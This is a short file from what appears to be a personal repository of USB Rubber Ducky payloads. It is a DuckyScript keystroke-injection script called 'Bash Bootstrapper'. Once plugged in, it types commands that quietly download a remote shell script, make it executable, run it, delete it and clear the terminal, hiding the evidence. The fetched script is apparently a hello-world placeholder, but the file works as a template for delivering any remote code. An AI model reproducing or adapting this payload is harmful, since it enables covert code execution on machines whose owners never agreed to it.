sysadmin.sh/payload.dd
2025-01-03 16:06:14 +08:00

25 lines
406 B
Plaintext

REM TITLE Bash Bootstrapper
REM AUTHOR Sajenim
REM DESCRIPTION Fetch and execute a script from remote repository
REM VERSION 1.0
DELAY 200
STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh
ENTER
DELAY 200
STRING chmod +x hello_world.sh
ENTER
DELAY 200
STRING ./hello_world.sh
ENTER
DELAY 200
STRING rm hello_world.sh
ENTER
DELAY 200
STRING clear
ENTER